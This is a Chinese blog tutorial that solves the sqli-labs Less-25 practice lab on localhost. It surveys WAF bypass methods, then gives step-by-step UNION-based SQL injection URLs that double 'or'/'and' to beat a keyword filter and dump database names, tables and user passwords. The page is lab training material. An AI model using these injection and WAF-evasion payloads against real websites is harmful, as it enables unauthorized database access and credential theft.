sqli-labs-less-25 get型waf绕过 or and 关键字重复

最新推荐文章于 2022-03-09 16:23:18 发布
最新推荐文章于 2022-03-09 16:23:18 发布
阅读量320 收藏 2
点赞数
分类专栏: sql注入 文章标签: sql web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/110558366
版权

补充知识:

sql注入waf绕过:

Waf绕过可分为三类:

一、 白盒绕过
通过源代码分析,进行绕过,分析源代码中有哪些转义规则,通过避开这些规则进行注入

二、 黑盒绕过
1、 架构层面绕过waf
(1) 寻找源网站进行waf检测,只要针对云waf,通过直接访问网站真实地址,绕过云waf的检测
(2) 通过同网段绕过waf检测
可能存在与该网站服务器在同一网段的主机,没有进行waf防护,我们可以通过对该主机进行入侵,获取权限后,利用该主机访问服务器,这时因为在内网,因此可能没有很高的防护,我们可以获取数据。

2、 资源限制角度绕过waf
一般waf的执行需要优先考虑业务优先的原则,所以对超大数据包可能不会进行检测,我们可以利用此原则,构造超大数据包进行绕过waf

3、 协议层面绕过waf
(1) 协议未覆盖绕过waf
可能由于业务需要,只对get型进行检测,post型选择忽略
(2) 参数污染
可能存在:index?id=1&id=2 waf只对id=1进行检测

4、 规则层面的绕过waf
(1) sql注释符绕过
union/* /select,可在注释符中添加注入语句
内联注释/!union select*/
(2) 空白符绕过
Mysql空白符%09、%0A;%0B
(3) 函数分割符绕过
比如使用一个空格分割concat()函数,concat%25A0(),
(4) 浮点数词法解释
Waf对id=1检测,可能对id=1E0、id=1.0没有检测
(5) 利用错误注入
(6) Mysql特殊语法
(7) 大小写绕过
Or AnD UnIoN
(8) 关键字重复
or->OorR
(9) 关键字绕过
And->&& or->|| =->like

Less-25 waf绕过or

在这里插入图片描述

提示我们通过id注入
首先测试注入点
http://127.0.0.1/sqli-labs-master/Less-25/?id=1 返回正常并且有回显
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-25/?id=1’ 报错
http://127.0.0.1/sqli-labs-master/Less-25/?id=1’–+ 正常
这里找到注入点,闭合方式为’’,下面我们开始注入

判断字段列数:

http://127.0.0.1/sqli-labs-master/Less-25/?id=1’ order by 4–+ 有报错,但是与我们在之前遇到的不一样,这里显示语法错误。
我们看一下提示部分:
在这里插入图片描述

Order变成了der,说明将or转义成了空字符
我们使用大小写转换试一下:
http://127.0.0.1/sqli-labs-master/Less-25/?id=1’ Order by 4–+ 同样报错
使用关键字重复
http://127.0.0.1/sqli-labs-master/Less-25/?id=1’ oorrder by 4–+
在这里插入图片描述

回显错误正常,说明关键字重复有效

获取回显位置:

http://127.0.0.1/sqli-labs-master/Less-25/?id=-1’ union select 1,2,3–+
在这里插入图片描述

通过在位置3回显数据,获取当前数据库
http://127.0.0.1/sqli-labs-master/Less-25/?id=-1’ union select 1,2,database()–+
在这里插入图片描述

获取所有数据库:

http://127.0.0.1/sqli-labs-master/Less-25/?id=-1’ union select 1,2,(select group_concat(schema_name) from infoorrmation_schema.schemata)–+
注意:information中的or也需要双写
在这里插入图片描述

获取security库中的表:

http://127.0.0.1/sqli-labs-master/Less-25/?id=-1’ union select 1,2,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7365637572697479)–+
在这里插入图片描述

获取users中的字段:

http://127.0.0.1/sqli-labs-master/Less-25/?id=-1’ union select 1,2,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)–+
返回错误
在这里插入图片描述

提示中and被转义成空白字符
我们双写and
http://127.0.0.1/sqli-labs-master/Less-25/?id=-1’ union select 1,2,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema=0x7365637572697479 anandd table_name=0x7573657273)–+
在这里插入图片描述

获取username和password

注意:password中的or也需要双写
http://127.0.0.1/sqli-labs-master/Less-25/?id=-1’ union select 1,2,(select group_concat(concat(username,0x7e,passwoorrd)) from security.users )–+
在这里插入图片描述

Less-25a与less-25类似,都是需要双写关键字进行注入,唯一不同是less-25a没有闭合,直接使用id=1 union select --+ 即可

yzcn
关注
专栏目录
sqli-labs学习笔记(十)less 29-31 绕过waf
闵行小鱼塘
09-16 386
继续学习sqli-labs,本篇是less 29-31
Sqli-labs靶场详细攻略Less 29-33
最新发布
qq_41755084的博客
10-27 1626
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf
PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)
bin789456的博客
09-20 2492
了解一下 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 例如: 下面这个图就是测试出来在能够哪些地方添加并得到特殊处理。 通过以上特性,当waf限制get参数类或者长度等等,我们就可以很轻松的绕过。 参考链接:https://www.freebuf.com/articles/web/213359.html 例题 buuctf-easycalc 打开题目,查看源代码 提示中显示有WAF,同时有一个检验函数,有一个
Sqli-labs Less29-31 过 waf
kevinhanser
08-10 747
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less29 - GET - Error based - IMPIDENCE MISMATCH - Having a WAF in front of web application 首先先看下 tomcat 中的index.jsp 文件 源代码 String rex = "^\\d+$"; #...
sql注入关于waf绕过
qq_43511094的博客
03-09 1130
sql注入关于waf绕过关于Waf绕过可大致分为三类:一、白盒绕过二、黑盒绕过1、架构层面绕过waf1.1、寻找源网站绕过waf检测1.2、通过同网段绕过waf防护2、资源限制角度绕过waf3、协议层面绕过waf3.1、协议为覆盖绕过waf3.2、参数污染4、规则层面绕过4.1、sql注释符绕过4.2、空白符绕过4.3、函数分隔符号4.4、浮点数词法解释4.5、利用error-based进行sql注入4.6、mysql特殊语法4.7、大小写绕过4.8、关键字重复4.9、关键字替换三、模糊测试 提示:以下
sqlilabs教程(21-30)
一个安全研究员
05-28 1967
less-21 此题的注入点还是再uname,不过这次uname别base64编码了,我们来看一下源码 首先来看一下这个危险字符过滤函数: 这个不是我们的重点,但是也是它导致我们在登陆界面不能进行注入。我们的重点放在后台代码对cookie中的uname的操作上: 可以看到,我们页面输出的uname的值实际上就是经过base64编码过后的username的值,如果他这里没有进行输入检...
8-Web安全——SQL注入WAF绕过之and,or,空格
网络安全
06-03 5310
1. and和or绕过 and和or的作用: and关键字表示同时满足两个条件,例如测试字符注入和数字注入用到的and 1=1和and1=2两个条件语句。 or表示满足其中一个条件即可,例如报错注入时用到的or语句 下面是后台过滤and和or关键字的源代码: function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_repl.
sqli-labs Less-29、30、31(sqli-labs闯关指南 29、30、31)—服务器(两层)架构
m0_54899775的博客
12-26 1885
sqli-labs Less-29、30、31(sqli-labs闯关指南 29、30、31)—服务器(两层)架构
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1689
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1716
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 1998
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库:
sqli-labs-less-2完整教程
yzcn
10-22 1767
Less-2 开始判断是否存在漏洞: http://127.0.0.1/sqli-labs-master/Less-2/?id=1 显示成功 http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ 显示失败,错误:’’ LIMIT 0,1’,表示在左边多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ --+ 进行注释后还是错误 http://127.0.0.1/sqli-labs-master
sqli-labs-less-7 使用outfile函数写入一句话木马
yzcn
10-30 1752
Less-7 一句话木马 判断注入点: 127.0.0.1/sqli-labs-master/Less-7/?id=1 显示正常 提示:You are in… Use outfile… 127.0.0.1/sqli-labs-master/Less-7/?id=1’ 显示错误,错误信息:You have an error in your SQL syntax 。。。。。。 127.0.0.1/sqli-labs-master/Less-7/?id=1’)) 显示错误 127.0.0.1/sqli-l
sqli-labs-less-4图文详解,适合小白
yzcn
10-23 1467
Less-4 less1-3以发布,1-4题相关知识点在https://blog.csdn.net/qq_46432288/article/details/109226871中,点击查看吧!!! less-4与1-3方法基本一致,只是最开始的判断注入点有一点差别。 判断注入: http://127.0.0.1/sqli-labs-master/Less-4/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 显示正常 http://12
sqli-labs-less-26 %a0绕过空格,报错注入
yzcn
12-03 1131
Less-26 该关卡提示空格和注释被转义,我们测试一下: http://127.0.0.1/sqli-labs-master/Less-26/?id=1 正常显示,有回显 http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ 报错 http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ --+ 依旧报错,并且提示提示信息为: 我们添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http:
sqli-labs-less-5布尔盲注+错误注入(超详细,小白专属)
yzcn
10-26 997
Less-5 判断注入点: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 正常显示,但是与前四关不同,这里只有一句话:you are in, http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ 显示错误,错误:’‘1’’ LIMIT 0,1’,多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-5/?id=1’–+ 将单引号注释后,显示正常,继续返回一句话you are
sqli-labs-less-15 post布尔盲注+sqlmap爆破
yzcn
11-12 879
Less-15 方法一: Post传参,先用burp suite抓包 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 显示登录成功,闭合方式为’’ uname=’) or 1=1 #&passwd=&submit=Submit 添加符号后没有报错信息,直接返回登录失败,说明这题只有正确或者错误两种返回,可以使用布尔盲注进行注入。 Substr(a,b,c):从位置b开始截取a字符中的前c个字符 判断当前数据库名长度: u
sqli-labs-less-8 布尔盲注+延时注入(详解)
yzcn
10-30 820
Less-8 延时注入+布尔盲注 判断注入点: http://127.0.0.1/sqli-labs-master/Less-8/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ 无任何回显 http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ --+ 显示正常,找到注入点,该题特点为正确时返回you are in,错误时无任何回显,可以考虑用之前的布尔盲注或者延时注入进行解题 方法一(布尔盲
sqli-labs-less-21 图文讲解
yzcn
12-03 780
Less-21 改关卡与less-20类似,也是通过cookie注入,只是我们在查看cookie值时发现value被加密了,因此我们需要多一步解密操作。 被加密后的value: 得到加密方式:利用在线加密解密网站进行破解, %3D使用=代替,尝试用base64解密后,得到原始值admin,因此加密方式为base64 判断闭合方式,查找注入点:使用加密后的admin’测试:报错 使用加密后啊admin’)测试,有报错 使用加密后的admin’)#测试,显示正常,说明闭合方式为(‘’) 判断回显位置:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值